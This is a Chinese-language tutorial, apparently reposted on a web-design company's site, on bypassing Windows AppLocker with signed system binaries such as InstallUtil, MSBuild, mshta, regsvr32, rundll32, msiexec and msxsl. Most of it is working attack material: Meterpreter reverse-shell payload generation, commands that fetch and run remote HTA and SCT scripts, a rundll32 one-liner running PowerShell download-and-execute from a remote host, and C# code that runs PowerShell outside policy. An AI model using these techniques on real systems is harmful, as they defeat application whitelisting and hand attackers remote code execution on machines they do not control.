這篇文章給大家介紹如何進(jìn)行AppLocker繞過分析����,內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒�����,希望對(duì)大家能有所幫助���。
創(chuàng)新互聯(lián)公司主要從事成都網(wǎng)站設(shè)計(jì)����、做網(wǎng)站����、成都外貿(mào)網(wǎng)站建設(shè)公司、網(wǎng)頁設(shè)計(jì)�、企業(yè)做網(wǎng)站、公司建網(wǎng)站等業(yè)務(wù)���。立足成都服務(wù)象山,十多年網(wǎng)站建設(shè)經(jīng)驗(yàn),價(jià)格優(yōu)惠��、服務(wù)專業(yè),歡迎來電咨詢建站服務(wù):18982081108
前言
什么是applocker
AppLocker即“應(yīng)用程序控制策略”���,是Windows 7系統(tǒng)中新增加的一項(xiàng)安全功能。在win7以上的系統(tǒng)中默認(rèn)都集成了該功能���,我們可以使用在services中啟用Application Identity�,然后在local security policy中找到Application Control Policies中看到Applocker選項(xiàng)�����。
applocker規(guī)則
默認(rèn)的Applocker規(guī)則支持以下幾種:
規(guī)則** | 關(guān)聯(lián)的文件格式 ---|--- 可執(zhí)行文件 | .exe�、.com 腳本 | .ps1、.bat���、.cmd��、.vbs��、.js Windows Installer 文件 | .msi�、.msp��、.mst 封裝應(yīng)用和封裝應(yīng)用安裝程序 | .appx DLL 文件 | .dll�����、.ocx
.appx并不是所有的applocker都會(huì)存在,應(yīng)根據(jù)windows版本來���,在win10上�����,創(chuàng)建applocker規(guī)則后會(huì)在C:\Windows\System32\AppLocker生產(chǎn)相應(yīng)的.applocker文件����。
applocker規(guī)則條件
規(guī)則條件是用于幫助 AppLocker 標(biāo)識(shí)要應(yīng)用規(guī)則的應(yīng)用的標(biāo)準(zhǔn)�����。三個(gè)主要規(guī)則條件為發(fā)布者�、路徑和文件哈希。
發(fā)布者:基于應(yīng)用的數(shù)字簽名標(biāo)識(shí)它
路徑:通過應(yīng)用在計(jì)算機(jī)文件系統(tǒng)中或網(wǎng)絡(luò)上的位置來標(biāo)識(shí)它
文件哈希:表示已標(biāo)識(shí)文件的系統(tǒng)計(jì)算的加密哈希
AppLocker 默認(rèn)規(guī)則
在你創(chuàng)建了一個(gè)applocker規(guī)則后��,系統(tǒng)會(huì)默認(rèn)詢問你是否添加一條默認(rèn)規(guī)則���,如下圖所示:
每個(gè)規(guī)則所對(duì)應(yīng)的默認(rèn)規(guī)則如下:
可執(zhí)行的默認(rèn)規(guī)則類型包括:
允許本地 Administrators 組的成員運(yùn)行所有應(yīng)用�����。
允許 Everyone 組的成員運(yùn)行 Windows 文件夾中的應(yīng)用�����。
允許 Everyone 組的成員運(yùn)行 Program Files 文件夾中的應(yīng)用���。
腳本默認(rèn)規(guī)則類型包括:
允許本地 Administrators 組的成員運(yùn)行所有腳本。
允許 Everyone 組的成員運(yùn)行 Program Files 文件夾中的腳本�。
允許 Everyone 組的成員運(yùn)行 Windows 文件夾中的腳本。
Windows Installer 默認(rèn)規(guī)則類型包括:
允許本地 Administrators 組的成員運(yùn)行所有 Windows Installer 文件�����。
允許 Everyone 組的成員運(yùn)行所有已進(jìn)行數(shù)字簽名的 Windows Installer 文件��。
允許 Everyone 組的成員運(yùn)行 Windows\Installer 文件夾中的所有 Windows Installer 文件���。
DLL 默認(rèn)規(guī)則類型:
允許本地 Administrators 組的成員運(yùn)行所有 DLL�����。
允許 Everyone 組的成員運(yùn)行 Program Files 文件夾中的 DLL��。
允許 Everyone 組的成員運(yùn)行 Windows 文件夾中的 DLL�����。
封裝應(yīng)用默認(rèn)規(guī)則類型:
AppLocker 規(guī)則行為
可將規(guī)則配置為使用允許或拒絕操作:
創(chuàng)建一個(gè)applocker規(guī)則
講了那么多����,我們以禁止在桌面上運(yùn)行exe文件為例,創(chuàng)建一條規(guī)則�����。創(chuàng)建完大體如下:
運(yùn)行exe測(cè)試:
系統(tǒng)就會(huì)阻止我們運(yùn)行
bypass Applocker
Installutil.exe
InstallUtil是.NET Framework的一部分����,是一個(gè)命令行程序��,它使用戶可以通過命令提示符快速安裝和卸載應(yīng)用程序��。由于此實(shí)用程序是Microsoft簽名的二進(jìn)制文件����,因此可以用來繞過AppLocker限制來運(yùn)行任何.NET可執(zhí)行文件�����。該實(shí)用程序也位于Windows文件夾內(nèi)����,該文件夾不會(huì)應(yīng)用AppLocker策略����,因?yàn)樾枰獔?zhí)行Windows文件夾的內(nèi)容才能使系統(tǒng)正常運(yùn)行。
首先我們使用WhiteListEvasion(https://github.com/khr0x40sh/WhiteListEvasion)生成一個(gè)模板
python InstallUtil.py --cs_file pentestlab.cs
--exe_file /root/Desktop/pentestlab.exe --payload
windows/meterpreter/reverse_https --lhost 192.168.0.103 --lport 443
上面的命令將生成一個(gè)C#模板�,其中將包含Metasploit ShellCode。
將生成后的文件放到目標(biāo)中使用下面的方法執(zhí)行:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U /root/payload.exe
當(dāng)然你也可以是先使用msf生成一個(gè)csharp的payload���,然后替換模板中的shellcode����,然后將cs文件傳到目標(biāo)機(jī)。
然后用csc編譯我們的腳本:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:exeshell.exe exeshell.cs
此時(shí)我們執(zhí)行我們的文件試試:
被規(guī)則攔截�����,那么我們使用
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
繞過
msf成功上線
在msf中也有使用InstallUtil.exe進(jìn)行applocker的bypass模塊��。
exploit/windows/local/applocker_bypass
原理是一樣的
附帶常見的路徑:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Msbuild.exe
MSBuild.exe(Microsoft Build Engine)是Visual Studio使用的軟件構(gòu)建平臺(tái)���。它采用XML格式的項(xiàng)目文件���,這些文件定義了構(gòu)建各種平臺(tái)和配置的要求。(引用:MSDN MSBuild)
我們可以使用MSBuild通過受信任的Windows實(shí)用工具代理代碼執(zhí)行�。.NET版本4中引入的MSBuild內(nèi)聯(lián)任務(wù)功能允許將C#代碼插入XML項(xiàng)目文件中。內(nèi)聯(lián)任務(wù)MSBuild將編譯并執(zhí)行內(nèi)聯(lián)任務(wù)�����。MSBuild.exe是一個(gè)經(jīng)過簽名的Microsoft二進(jìn)制文件��,因此���,以這種方式使用它時(shí)�,它可以執(zhí)行任意代碼,并繞過配置為允許MSBuild.exe執(zhí)行的應(yīng)用程序白名單防護(hù).
我們這里直接使用GreatSCT生成一個(gè)xml文件����。
./GreatSCT.py --ip 192.168.0.106 --port 4444 -t bypass -p msbuild/meterpreter/rev_tcp.py
并且會(huì)給我們生成一個(gè)rc文件,我們可以使用msfconsole -r 直接啟動(dòng)msf
然后使用msbuild執(zhí)行�,
msf上線:
當(dāng)然你也可以是使用msf生成一個(gè)c#的shellcode然后使用三好學(xué)生師傅的模板加載:
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
注意將后綴名改為.csproj
除了反彈shell以外我們還可以用它來繞過powershell的限制。
代碼如下:
");
string x = Console.ReadLine();
try
{
Console.WriteLine(RunPSCommand(x));
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
return true;
}
//Based on Jared Atkinson's And Justin Warner's Work
public static string RunPSCommand(string cmd)
{
//Init stuff
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
//Add commands
pipeline.Commands.AddScript(cmd);
//Prep PS for string output and invoke
pipeline.Commands.Add("Out-String");
Collection results = pipeline.Invoke();
runspace.Close();
//Convert records to strings
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
public static void RunPSFile(string script)
{
PowerShell ps = PowerShell.Create();
ps.AddScript(script).Invoke();
}
}
]]>
原地址:https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20PowerShellCommands.xml
成功繞過對(duì)powershell的限制�����。
常見路徑如下:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
Mshta.exe
mshta.exe是微軟Windows操作系統(tǒng)相關(guān)程序���,英文全稱Microsoft HTML Application�����,可翻譯為微軟超文本標(biāo)記語言應(yīng)用,用于執(zhí)行.HTA文件��。默認(rèn)已集成在環(huán)境變量中���。
使用Mshta的方式有很多�,我們這里使用msf的exploit/windows/misc/hta_server模塊進(jìn)行測(cè)試:
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
目標(biāo)機(jī)執(zhí)行:
mshta.exe http://192.168.0.106:8080/JR1gb3TO6.hta
即可上線�。
除了這種方法hta還可以使用cobaltstrike ����、Setoolkit�、Magic unicorn、Empire���、CactusTorch��、Koadic����、Great SCT等進(jìn)行上線��。
除了本地文件����,mshta還支持遠(yuǎn)程下載的方式執(zhí)行payload,比如:
mshta.exe javascript:a=GetObject("script:https://gist.github.com/someone/something.sct").Exec();close();
除了以上的方式����,mshta可以用用來執(zhí)行powershell:
即使applocker已經(jīng)禁止powershell執(zhí)行了
InfDefaultInstall.exe
InfDefaultInstall.exe是一個(gè)用來進(jìn)行inf安裝的工具,具有微軟簽名���,存在路徑為:
我們也可以用它來繞過一些限制�����。用法就是直接該文件后面跟你的inf文件即可���。
它的執(zhí)行流程如下:
作者給出的poc地址如下:
https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
思路也和圖中那樣��,使用shady.inf去調(diào)用遠(yuǎn)程的sct后門����。
不過他的調(diào)用需要更高的權(quán)限�����,我在win10下運(yùn)行的截圖:
Mavinject.exe
Mavinject是win10上面自帶的windows組件���,我們可以用它來進(jìn)行dll注入�����,并繞過部分限制。
用法如下:
mavinject32.exe
常見路徑如下:
C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
C:\Windows\System32\mavinject.exe
C:\Windows\SysWOW64\mavinject.exe
但是我本地復(fù)現(xiàn)的時(shí)候并沒有成功注入�,但是也沒有什么提示,不知道具體原因是什么�����,版本為: 10.0.15063.0 (WinBuild.160101.0800)
應(yīng)該是可以成功注入的,附上一張推特大佬成功的圖�����。
有興趣的可以多嘗試幾個(gè)系統(tǒng)��。
MSIEXEC
MSIEXEC是Microsoft的應(yīng)用程序���,可用于從命令行安裝或配置產(chǎn)品�����。這個(gè)其實(shí)不是很陌生的了���,我之前也寫過用它來進(jìn)行提權(quán)的文章。我們假設(shè)可以執(zhí)行msi文件����,用它來繞過applocker對(duì)powershell的限制。
先用msf生成一個(gè)msi文件���。
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
windows下執(zhí)行:
成功繞過����。
msxsl.exe
msxsl.exe是一個(gè)xml的轉(zhuǎn)換器,帶有微軟數(shù)字簽名��。下載地址如下:
https://www.microsoft.com/en-us/download/details.aspx?id=21714
我們使用3gstudent來嘗試?yán)@過applocker對(duì)calc的限制�����,
customers.xml:
John Smith 123 Elm St. (123) 456-7890
Mary Jones 456 Oak Ave. (156) 789-0123
script.xml:
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
return nodelist.nextNode().xml;
}
成功繞過:
當(dāng)然也可以執(zhí)行我們的shellcode����,具體參考:
https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Regsv***.exe
regsv***是Windows命令行實(shí)用程序,用于將.dll文件和ActiveX控件注冊(cè)和注銷到注冊(cè)表中�。
文件位置:
下面為大家演示,繞過applocker上線���。
scT文件內(nèi)容如下:
各參數(shù)的含義:
除了本地執(zhí)行���,它還支持遠(yuǎn)程加載:
regsv*** /u /n /s /i:http://ip:port/payload.sct scrobj.dll
sct我們使用GreatSct生成即可�。
Rundll32.exe
Rundll32是一個(gè)Microsoft二進(jìn)制文件�,可以執(zhí)行DLL文件中的代碼�����。由于此實(shí)用程序是Windows操作系統(tǒng)的一部分,因此可以用作繞過AppLocker規(guī)則或軟件限制策略的方法
先生成我們的payload:
目標(biāo)機(jī)執(zhí)行:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();
new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"上線:
除了遠(yuǎn)程之外���,也可以本地上線:
rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll
也可以用來繞過對(duì)某些軟件的限制���,比如彈個(gè)cmd:
關(guān)于如何進(jìn)行AppLocker繞過分析就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助��,可以學(xué)到更多知識(shí)����。如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到�����。
分享名稱:如何進(jìn)行AppLocker繞過分析
轉(zhuǎn)載注明:
http://weahome.cn/article/ihhddp.html
重慶分公司
重慶分公司
